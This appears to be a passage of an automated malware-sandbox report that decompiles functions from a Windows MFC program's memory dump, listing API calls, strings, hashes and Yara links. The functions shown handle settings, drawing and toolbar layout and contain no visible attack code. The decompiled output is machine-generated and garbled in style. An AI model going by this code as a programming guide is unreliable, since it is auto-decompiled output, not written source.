#6026.MFC42(0000E001), ref: 0040CBD9
#537.MFC42(0000E000,0000E001), ref: 0040CBE7
#6199.MFC42(00000000,0000E000,0000E001), ref: 0040CBF3
#800.MFC42(00000000,0000E000,0000E001), ref: 0040CBFF
#537.MFC42(0000E000,00000000,0000E000,0000E001), ref: 0040CC08
#800.MFC42(00000000,0000E000,00000000,0000E000,0000E001), ref: 0040CC24
#1199.MFC42(00008072,00000000,000000FF), ref: 0040CC52
#6402.MFC42(Settings,Language,00000001,00008072,00000000,000000FF), ref: 0040CC71

Strings

Language, xrefs: 0040CC61
Settings, xrefs: 0040CC66
Settings, xrefs: 0040CB7F
CWUCliFr.dll, xrefs: 0040CBA8
Language, xrefs: 0040CB7A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #537#6402#800Library$#1168#1199#6026#6199FreeH_prologLoad
String ID: CWUCliFr.dll$Language$Language$Settings$Settings
API String ID: 2323526148-118327331
Opcode ID: e59b2385ead90d25a1f1d5ec795a5d9dbb69f1ab142003286f828cbc174c3b7e
Instruction ID: 72884b20e7a252d1d2219d1f4aecf037f1202cf089a83bc32124f745b725081f
Opcode Fuzzy Hash: e59b2385ead90d25a1f1d5ec795a5d9dbb69f1ab142003286f828cbc174c3b7e
Instruction Fuzzy Hash: 4B31C030700610EFDB10BF65E982AADB765AB45754F50822FF516672E2CFBC5A00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040B17A, Relevance: 30.2, APIs: 20, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B17A(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t131;
				intOrPtr _t136;
				intOrPtr _t163;
				void* _t168;
				void* _t170;
				intOrPtr _t171;

				L004269E6();
				_t171 = _t170 - 0x154;
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x10)) = _t171;
				 *((intOrPtr*)(_t168 - 0x18)) = __ecx;
				L00401A46(_t168 - 0x40);
				 *(_t168 - 4) = 0;
				 *(_t168 - 4) = 1;
				do {
					_push( *((intOrPtr*)(__ecx + 0x1c)));
					E0040162C(_t168 - 0x40);
					_t89 =  *((intOrPtr*)(__ecx + 0x1c));
					_t131 =  *((intOrPtr*)(_t89 + 0x24));
				} while (_t131 !=  *((intOrPtr*)(_t89 + 0x28)));
				_t90 =  *((intOrPtr*)(_t168 - 0x30));
				_t163 = 1;
				 *(_t168 - 4) = 0;
				if(_t90 != _t163) {
					__eflags = _t90 - 2;
					if(_t90 != 2) {
						__eflags = _t90 - 5;
						if(__eflags != 0) {
							__eflags = _t90 - 6;
							if(__eflags != 0) {
								__eflags = _t90 - 7;
								if(__eflags != 0) {
									__eflags = _t90 - 3;
									if(_t90 != 3) {
										__eflags = _t90 - 4;
										if(_t90 == 4) {
											_push(_t131);
											 *((intOrPtr*)(_t168 - 0x14)) = _t171;
											_push(_t168 - 0x34);
											L0042611A();
											_push( *((intOrPtr*)(_t168 - 0x38)));
											 *(_t168 - 4) = 0xe;
											_push(_t171);
											 *((intOrPtr*)(_t168 - 0x20)) = _t171;
											_push(_t168 - 0x3c);
											L0042611A();
											_t94 = _t168 - 0x1c;
											 *(_t168 - 4) = 0;
											_push(_t168 - 0x1c);
											L00425FE8();
											_push(_t171);
											_t136 = _t171;
											 *((intOrPtr*)(_t168 - 0x18)) = _t171;
											goto L17;
										}
									} else {
										_push(_t131);
										 *((intOrPtr*)(_t168 - 0x14)) = _t171;
										_push(_t168 - 0x34);
										L0042611A();
										_push( *((intOrPtr*)(_t168 - 0x38)));
										 *(_t168 - 4) = 0xc;
										_push(_t171);
										 *((intOrPtr*)(_t168 - 0x20)) = _t171;
										_push(_t168 - 0x3c);
										L0042611A();
										 *(_t168 - 4) = 0;
										_push(_t168 - 0x1c);
										L00425FE8();
										_push(_t171);
										 *((intOrPtr*)(_t168 - 0x18)) = _t171;
										L00401749(_t171, _t168 - 0x1c);
										L00401A96( *((intOrPtr*)(__ecx + 0x14)));
									}
								} else {
									_push(_t131);
									 *((intOrPtr*)(_t168 - 0x14)) = _t171;
									_push(_t168 - 0x34);
									L0042611A();
									_push( *((intOrPtr*)(_t168 - 0x38)));
									 *(_t168 - 4) = 0xa;
									_push(_t171);
									 *((intOrPtr*)(_t168 - 0x20)) = _t171;
									_push(_t168 - 0x3c);
									L0042611A();
									 *(_t168 - 4) = 0;
									_push(_t168 - 0x1c);
									L00425FE8();
									_push(_t171);
									 *((intOrPtr*)(_t168 - 0x18)) = _t171;
									L00401749(_t171, _t168 - 0x1c);
									E004014A1( *((intOrPtr*)(__ecx + 0x14)), __eflags);
								}
							} else {
								_push(_t131);
								 *((intOrPtr*)(_t168 - 0x14)) = _t171;
								_push(_t168 - 0x34);
								L0042611A();
								E00401C49( *((intOrPtr*)(__ecx + 0x14)), __eflags);
							}
						} else {
							_push( *((intOrPtr*)(_t168 - 0x38)));
							_push(_t131);
							 *((intOrPtr*)(_t168 - 0x14)) = _t171;
							_push(_t168 - 0x34);
							L0042611A();
							E0040207C( *((intOrPtr*)(__ecx + 0x14)), __eflags);
						}
					} else {
						_push(_t131);
						 *((intOrPtr*)(_t168 - 0x14)) = _t171;
						_push(_t168 - 0x34);
						L0042611A();
						_push( *((intOrPtr*)(_t168 - 0x38)));
						 *(_t168 - 4) = 8;
						_push(_t171);
						 *((intOrPtr*)(_t168 - 0x20)) = _t171;
						_push(_t168 - 0x3c);
						L0042611A();
						_t94 = _t168 - 0x1c;
						 *(_t168 - 4) = 0;
						_push(_t168 - 0x1c);
						L00425FE8();
						_push(_t171);
						_t136 = _t171;
						 *((intOrPtr*)(_t168 - 0x18)) = _t171;
						L17:
						L00401749(_t136, _t94);
						L00401A96( *((intOrPtr*)(_t166 + 0x14)));
						E004020C7( *((intOrPtr*)(_t166 + 0x14)), __eflags);
					}
				} else {
					_push(_t131);
					 *((intOrPtr*)(_t168 - 0x1c)) = _t171;
					_push(_t168 - 0x34);
					L0042611A();
					_push( *((intOrPtr*)(_t168 - 0x38)));
					 *(_t168 - 4) = 3;
					_push(_t171);
					 *((intOrPtr*)(_t168 - 0x18)) = _t171;
					_push(_t168 - 0x3c);
					L0042611A();
					 *(_t168 - 4) = 0;
					_push(_t168 - 0x20);
					L00425FE8();
					_push(_t171);
					 *((intOrPtr*)(_t168 - 0x14)) = _t171;
					L00401749(_t171, _t168 - 0x20);
					L00401A96( *((intOrPtr*)(__ecx + 0x14)));
					 *(_t168 - 4) = 5;
					L00401A46(_t168 - 0x60);
					_push(__ecx + 0x24);
					 *(_t168 - 4) = 6;
					L00426054();
					_push(0x44215c);
					 *((intOrPtr*)(_t168 - 0x58)) =  *((intOrPtr*)(__ecx + 0x28));
					L004261A4();
					_push(_t168 - 0x60);
					 *((intOrPtr*)(_t168 - 0x50)) = _t163;
					L00401302(__ecx);
					 *(_t168 - 4) = 5;
					L00401D48(_t168 - 0x60);
				}
				 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
				_t91 = L00401D48(_t168 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
				return _t91;
			}

APIs

_EH_prolog.MSVCRT ref: 0040B17F

Part of subcall function 0040162C: _EH_prolog.MSVCRT ref: 0041BD46
Part of subcall function 0040162C: #882.MFC42(?,00000000), ref: 0041BD6E
Part of subcall function 0040162C: #882.MFC42(?,?,?,?,00000000), ref: 0041BD82
Part of subcall function 0040162C: #882.MFC42(?,?,?,?,?,?,?,00000000), ref: 0041BD96

#535.MFC42(?,?), ref: 0040B1F7
#535.MFC42(?,?,?,?,?), ref: 0040B20D
#3811.MFC42(?,?,?,?,?,?), ref: 0040B219
#858.MFC42(?,00000000,?,?,?,?,?,?,?), ref: 0040B249
#860.MFC42(0044215C,?,00000000,?,?,?,?,?,?,?), ref: 0040B25C

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #882$#535H_prolog$#3811#858#860
String ID:
API String ID: 40284684-0
Opcode ID: 7d537c24c71f64908e1c52fbdef3c2b5e17a0d80a82b5702752e770c448acad3
Instruction ID: 7f9009356d8474273915c0ee073ac835b291450d51d662ac8099fd279c1cff75
Opcode Fuzzy Hash: 7d537c24c71f64908e1c52fbdef3c2b5e17a0d80a82b5702752e770c448acad3
Instruction Fuzzy Hash: 97816370E01209EBCF14EFE5D9569AEBBB9EF45318F50055FF401B3292C7386A04CA6A

Uniqueness

Uniqueness Score: -1.00%

Function 004010AF, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004010AF() {
				long _t36;
				int _t37;
				int _t40;
				void* _t63;

				L004269E6();
				 *(_t63 - 0x1c) = 0x42e55c;
				 *((intOrPtr*)(_t63 - 0x18)) = 0;
				 *((intOrPtr*)(_t63 - 4)) = 0;
				 *((intOrPtr*)(_t63 - 0x10)) = 0;
				 *(_t63 - 0x14) = 0x42e544;
				_t8 = _t63 + 0x14; // 0x42e544
				 *((char*)(_t63 - 4)) = 1;
				_push(CreateSolidBrush( *_t8));
				L004264BC();
				_push(CreatePen(0, 0,  *(_t63 + 0x14)));
				L004264BC();
				_t36 = _t63 - 0x1c;
				_push(_t36);
				L00426570();
				 *(_t63 + 0x14) = _t36;
				_t37 = _t63 - 0x14;
				_push(_t37);
				L00426636();
				 *(_t63 + 0xc) = _t37;
				_t40 = Ellipse( *( *((intOrPtr*)(_t63 + 8)) + 4),  *(_t63 + 0xc),  *(_t63 + 0x10),  *(_t63 + 0xc) + 6,  *(_t63 + 0x10) + 6);
				_push( *(_t63 + 0x14));
				L00426570();
				_push( *(_t63 + 0xc));
				L00426636();
				L00425FA6();
				L00425FA6();
				 *(_t63 - 0x14) = 0x42c514;
				 *((char*)(_t63 - 4)) = 2;
				L00425FA6();
				 *(_t63 - 0x14) = 0x42c4fc;
				 *(_t63 - 0x1c) = 0x42c514;
				 *((intOrPtr*)(_t63 - 4)) = 3;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return _t40;
			}

APIs

_EH_prolog.MSVCRT ref: 004162DC
CreateSolidBrush.GDI32(DB), ref: 0041630D
#1641.MFC42(00000000), ref: 00416317
CreatePen.GDI32(00000000,00000000,0042E544), ref: 00416321
#1641.MFC42(00000000), ref: 0041632B
#5787.MFC42(0042E55C,00000000), ref: 00416339
#5787.MFC42(0042E544,0042E55C,00000000), ref: 00416347
Ellipse.GDI32(00000001,?,?,?,?), ref: 0041635E
#5787.MFC42(0042E544), ref: 00416369
#5787.MFC42(?,0042E544), ref: 00416373
#2414.MFC42(?,0042E544), ref: 0041637B
#2414.MFC42(?,0042E544), ref: 00416383
#2414.MFC42(?,0042E544), ref: 00416397
#2414.MFC42(?,0042E544), ref: 004163B0

Strings

DB, xrefs: 004162FF
DB, xrefs: 00416306
\B, xrefs: 004162EC

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414#5787$#1641Create$BrushEllipseH_prologSolid
String ID: DB$DB$\B
API String ID: 361696367-3260928073
Opcode ID: 6de5fcd1e2b4d638e1daded483a22f0cbbd2ac7cbcbb992c79a64f438798f46d
Instruction ID: 0742fc306519cae10e1eaaa39b88ebb73b3390f671d3f208fb94ae8d1fa4b640
Opcode Fuzzy Hash: 6de5fcd1e2b4d638e1daded483a22f0cbbd2ac7cbcbb992c79a64f438798f46d
Instruction Fuzzy Hash: A42161B1E0012AEBCB01EF95EA459EFBB78EF44308F51401EF411A3251DB785B15CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004116C8, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E004116C8(void* __eax, void* __ecx, intOrPtr _a4) {
				char _v260;
				CHAR* _t24;
				void* _t34;

				_t34 = __ecx;
				L00425E44();
				L00426510();
				wsprintfA( &_v260, "%s-SCBar-%d", _a4, __eax);
				_push( *((intOrPtr*)(_t34 + 0x84)));
				_push("sizeHorzCX");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x88)));
				_push("sizeHorzCY");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x8c)));
				_push("sizeVertCX");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x90)));
				_push("sizeVertCY");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x94)));
				_push("sizeFloatCX");
				_push( &_v260);
				L0042624C();
				_push( *((intOrPtr*)(_t34 + 0x98)));
				_t24 =  &_v260;
				_push("sizeFloatCY");
				_push(_t24);
				L0042624C();
				return _t24;
			}

APIs

#1168.MFC42 ref: 004116D5
#3089.MFC42 ref: 004116DF
wsprintfA.USER32 ref: 004116F4
#6402.MFC42(?,sizeHorzCX,?), ref: 00411711
#6402.MFC42(?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 0041172A
#6402.MFC42(?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 00411743
#6402.MFC42(?,sizeVertCY,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 0041175C
#6402.MFC42(?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeHorzCY,?,?,sizeHorzCX,?), ref: 00411775
#6402.MFC42(?,sizeFloatCY,?,?,sizeFloatCX,?,?,sizeVertCY,?,?,sizeVertCX,?,?,sizeHorzCY,?,?), ref: 0041178E

Strings

%s-SCBar-%d, xrefs: 004116EE
sizeHorzCY, xrefs: 00411724
sizeFloatCY, xrefs: 00411788
sizeFloatCX, xrefs: 0041176F
sizeVertCY, xrefs: 00411756
sizeVertCX, xrefs: 0041173D
sizeHorzCX, xrefs: 0041170B

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6402$#1168#3089wsprintf
String ID: %s-SCBar-%d$sizeFloatCX$sizeFloatCY$sizeHorzCX$sizeHorzCY$sizeVertCX$sizeVertCY
API String ID: 830531456-2433185349
Opcode ID: 8eebb0ad80f3cb585a723c84734895b73363e3c458f5d5879b32f2bec5e6fccc
Instruction ID: ce1d6f130222f0aff37d73ec1b3c2292528de4fe488021d3fbdc8c86680536b9
Opcode Fuzzy Hash: 8eebb0ad80f3cb585a723c84734895b73363e3c458f5d5879b32f2bec5e6fccc
Instruction Fuzzy Hash: C811A734700328E7DF2577359C45FCB7B6EAF84304F40059AB949A3252D979A5948B78

Uniqueness

Uniqueness Score: -1.00%

Function 00401537, Relevance: 27.2, APIs: 18, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00401537(void* __edx) {
				struct HWND__* _t91;
				struct HDC__* _t93;
				signed int _t102;
				void* _t109;
				signed int _t110;
				intOrPtr _t111;
				signed int _t112;
				struct HWND__* _t121;
				intOrPtr _t123;
				intOrPtr _t127;
				wchar_t* _t128;
				signed int _t130;
				signed int _t133;
				intOrPtr _t141;
				signed int _t142;
				void* _t153;
				struct HDC__* _t163;
				signed int _t166;
				struct tagSIZE _t170;
				signed int _t173;
				void* _t174;

				_t153 = __edx;
				L004269E6();
				_t127 =  *((intOrPtr*)(_t174 + 8));
				 *((intOrPtr*)(_t174 - 0x10)) = 4;
				_t166 = ( *(_t127 + 0x14))[4];
				if(L0040214E( *(_t127 + 0x14)) != 0 &&  *0x440cfc != 0) {
					 *((intOrPtr*)(_t174 - 0x10)) = 7;
				}
				if((_t166 & 0x00000800) == 0) {
					 *(_t174 - 0x20) =  *(_t174 - 0x20) & 0x00000000;
					 *((intOrPtr*)(_t174 - 0x24)) = 0x42dce0;
					_t130 = 0xf;
					 *(_t174 - 4) =  *(_t174 - 4) & 0x00000000;
					memset(_t174 - 0x74, 0, _t130 << 2);
					 *(_t174 - 0x1c8) = 0x154;
					SystemParametersInfoA(0x29, 0x154, _t174 - 0x1c8, 0);
					_t133 = 0xf;
					_push(CreateFontIndirectA(memcpy(_t174 - 0x74, _t174 - 0x128, _t133 << 2)));
					L004264BC();
					_t91 = L00401307();
					 *(_t174 - 0x1c) = _t91;
					if(_t91 == 0) {
						_t121 = GetDesktopWindow();
						_push(_t121);
						L00426372();
						 *(_t174 - 0x1c) = _t121;
					}
					_t93 = GetDC( *( *(_t174 - 0x1c) + 0x20));
					_push(_t93);
					L00425FD0();
					 *(_t174 - 0x28) =  *(_t174 - 0x28) & 0x00000000;
					_t163 = _t93;
					if( *0x4421ac >= 2) {
						 *(_t174 - 0x28) =  *((intOrPtr*)(_t163->i + 0x30))(_t174 - 0x24);
					}
					_t128 =  *( *(_t127 + 0x14));
					 *((intOrPtr*)(_t174 - 0x14)) = 0;
					 *(_t174 - 0x18) = 0;
					if( *0x4421ac == 0) {
						 *((intOrPtr*)(_t174 - 0x34)) = 0;
						 *(_t174 - 0x38) = 0;
						 *((intOrPtr*)(_t174 - 0x14)) = DrawTextA( *(_t163 + 4), _t128, wcslen(_t128), _t174 - 0x38, 0x424);
						 *(_t174 - 0x18) =  *((intOrPtr*)(_t174 - 0x30)) -  *(_t174 - 0x38) + 3;
						_t102 = wcslen(_t128);
						 *(_t174 - 0x18) =  *(_t174 - 0x18) +  *(_t174 - 0x18) / _t102 +  *(_t174 - 0x18) / _t102 * 2;
					} else {
						GetTextExtentPoint32W( *(_t163 + 4), _t128, wcslen(_t128), _t174 - 0x18);
					}
					_t170 =  *(_t174 - 0x18);
					 *((intOrPtr*)(_t174 - 0x2c)) =  *((intOrPtr*)(_t174 - 0x14));
					if( *0x4421ac >= 2) {
						 *((intOrPtr*)(_t163->i + 0x30))( *(_t174 - 0x28));
					}
					_t109 = L0040214E(ReleaseDC( *( *(_t174 - 0x1c) + 0x20),  *(_t163 + 4)));
					_t110 =  *0x440d08; // 0x10
					if(_t109 == 0) {
						_t111 = _t170 + 1 + _t110 * 2;
					} else {
						_t111 = _t110 + _t170 +  *((intOrPtr*)(_t174 - 0x10)) + 8;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t174 + 8)) + 0xc)) = _t111;
					_t112 = GetSystemMetrics(0xf);
					_t141 =  *0x440d0c; // 0xf
					_t142 = _t141 +  *((intOrPtr*)(_t174 - 0x10));
					if(_t112 <= _t142) {
						_t112 = _t142;
					}
					 *( *((intOrPtr*)(_t174 + 8)) + 0x10) = _t112;
					L00425FA6();
					 *((intOrPtr*)(_t174 - 0x24)) = 0x42c514;
					 *(_t174 - 4) = 1;
					L00425FA6();
				} else {
					 *(_t127 + 0xc) =  *(_t127 + 0xc) & 0x00000000;
					_t173 = GetSystemMetrics(0xf) >> 1;
					_t112 = L0040214E(_t122);
					if(_t112 == 0) {
						_t123 =  *0x440d0c; // 0xf
						asm("cdq");
						_t112 = _t123 +  *((intOrPtr*)(_t174 - 0x10)) - _t153 >> 1;
						if(_t173 > _t112) {
							_t112 = _t173;
						}
						 *(_t127 + 0x10) = _t112;
					} else {
						 *(_t127 + 0x10) = 3;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t174 - 0xc));
				return _t112;
			}

APIs

_EH_prolog.MSVCRT ref: 004143E5
GetSystemMetrics.USER32 ref: 00414429
SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 00414496
CreateFontIndirectA.GDI32(?), ref: 004144AE
#1641.MFC42(00000000), ref: 004144B8
GetDesktopWindow.USER32 ref: 004144C9
#2864.MFC42(00000000), ref: 004144D0
GetDC.USER32(00000000), ref: 004144DE
#2859.MFC42(00000000), ref: 004144E5
wcslen.MSVCRT ref: 00414521
GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 0041452D
wcslen.MSVCRT ref: 0041454B
DrawTextA.USER32(?,?,00000000), ref: 00414553
wcslen.MSVCRT ref: 00414569
ReleaseDC.USER32 ref: 004145A4
GetSystemMetrics.USER32 ref: 004145D0
#2414.MFC42 ref: 004145F0
#2414.MFC42 ref: 00414606

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Systemwcslen$#2414MetricsText$#1641#2859#2864CreateDesktopDrawExtentFontH_prologIndirectInfoParametersPoint32ReleaseWindow
String ID:
API String ID: 3078924865-0
Opcode ID: 6febc4d263af19415d94340daa2e098c17e54691c249b63a8395e86f4d2d32f0
Instruction ID: b36e5ad9765593f0afb3f9444e4d01b5a5d8d127de33ffd1d292755c494f769a
Opcode Fuzzy Hash: 6febc4d263af19415d94340daa2e098c17e54691c249b63a8395e86f4d2d32f0
Instruction Fuzzy Hash: E4715CB5A00219DFDB04DFA4D989BEEBBB5FF48304F10406AE905E7291D778A944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401541, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401541(void* __ecx) {
				void* _t40;
				intOrPtr _t41;
				int _t48;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				void* _t73;

				L004269E6();
				_t71 = __ecx;
				_push(__ecx);
				L00426558();
				 *(_t73 - 4) = 0;
				L004264B0();
				 *(_t73 - 4) = 1;
				asm("sbb eax, eax");
				_push(CreateCompatibleDC( ~(_t73 - 0x80) &  *(_t73 - 0x7c)));
				L004264AA();
				_t40 = __ecx + 0x4c;
				if(_t40 != 0) {
					_t41 =  *((intOrPtr*)(_t40 + 4));
				} else {
					_t41 = 0;
				}
				_push(_t41);
				_push( *(_t73 - 0x18));
				L00426540();
				_t67 = _t41;
				if((GetDeviceCaps( *(_t73 - 0x78), 0x26) & 0x00000001) != 0 &&  *((intOrPtr*)(_t71 + 0x58)) != 0) {
					_push(0);
					_push(_t71 + 0x54);
					L00426810();
					RealizePalette( *(_t73 - 0x7c));
				}
				GetWindowRect( *(_t71 + 0x20), _t73 - 0x2c);
				asm("sbb eax, eax");
				_t48 = BitBlt( *(_t73 - 0x7c), 0, 0,  *((intOrPtr*)(_t73 - 0x24)) -  *(_t73 - 0x2c),  *((intOrPtr*)(_t73 - 0x20)) -  *((intOrPtr*)(_t73 - 0x28)),  ~(_t73 - 0x1c) &  *(_t73 - 0x18), 0, 0, 0xcc0020);
				if(_t67 != 0) {
					_t68 =  *((intOrPtr*)(_t67 + 4));
				} else {
					_t68 = 0;
				}
				_push(_t68);
				_push( *(_t73 - 0x18));
				L00426540();
				 *(_t73 - 4) = 0;
				L0042649E();
				 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
				L00426552();
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return _t48;
			}

APIs

_EH_prolog.MSVCRT ref: 00420BF3
#470.MFC42 ref: 00420C04
#323.MFC42 ref: 00420C11
CreateCompatibleDC.GDI32(?), ref: 00420C25
#1640.MFC42(00000000), ref: 00420C2F
#5785.MFC42(?,?,00000000), ref: 00420C46
GetDeviceCaps.GDI32(?,00000026), ref: 00420C52
#5791.MFC42(?,00000000), ref: 00420C6A
RealizePalette.GDI32(?), ref: 00420C72
GetWindowRect.USER32 ref: 00420C7F
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00420CAA
#5785.MFC42(?,?), ref: 00420CBF
#640.MFC42(?,?), ref: 00420CCA
#755.MFC42(?,?), ref: 00420CD6

Strings

cbw, xrefs: 00420C52

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
